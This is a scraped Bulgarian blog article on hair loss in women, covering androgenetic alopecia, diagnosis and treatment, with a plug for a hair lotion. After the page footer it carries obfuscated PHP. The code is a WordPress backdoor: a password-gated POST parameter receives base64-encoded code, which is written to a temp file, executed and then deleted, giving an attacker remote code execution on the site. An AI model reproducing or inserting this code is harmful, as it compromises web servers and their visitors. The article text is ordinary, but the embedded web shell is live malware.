Лечение на косопад при жените | Косопад

Лечение на косопад при жените

Косопадът е неприятно състояние, отразяващо се по особен начин върху психиката на жените. Може да се появи както по време на менопаузата, така и много по – рано при навършване на 20 години. За нежния пол косата има решаващо значение не само за привлекателността, но също така е пряко свързана с половата идентичност и сексуалността.

косопад при жените

Най – честата причина за косопад при жените е андрогенната алопеция, дължи се на генетична чувствителност на космените фоликули към хормона дихидротестостерон. В повечето случаи може да се излекува, стига да бъде поставена правилната диагноза и съответно назначено правилното лечение. В подобни случаи посещението при специалист е задължително, защото ако се обърка нещо, може да има много тежки последствия.

Андрогенната алопеция при жените обичайно започва от средната линия на косата и с течение на времето се разпространява към предната част на главата. За поставяне на категорична диагноза задължително трябва да се направи задълбочен хормонален анализ и понякога биопсия. Защото е възможно причината да е недостиг на важни хранителни вещества като желязо или витамини например.

Изключително важно е лечението да започне още в ранните стадии на косопад. Всяко закъснение влияе отрицателно, а космените фоликули стават все по – неотзивчиви във времето. Обичайно, лечението протича на два етапа – спиране на загубите и подновяване растежа на косата.

За намаляване на симптомите може да се използват различни продукти (виж лосионът срещу косопад „Ефект – 2”) и / или да се усили приемът на витамини. Понякога се налага и хормонално лечение, особено при настъпване на климактериум. Най – хубавото е, че при жените успехът при прераждане на косата е много голям и в повечето случаи има решение на проблема.

09. декември 2013 20:14:11 от Косопад
Категории: Косопад – Статии | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}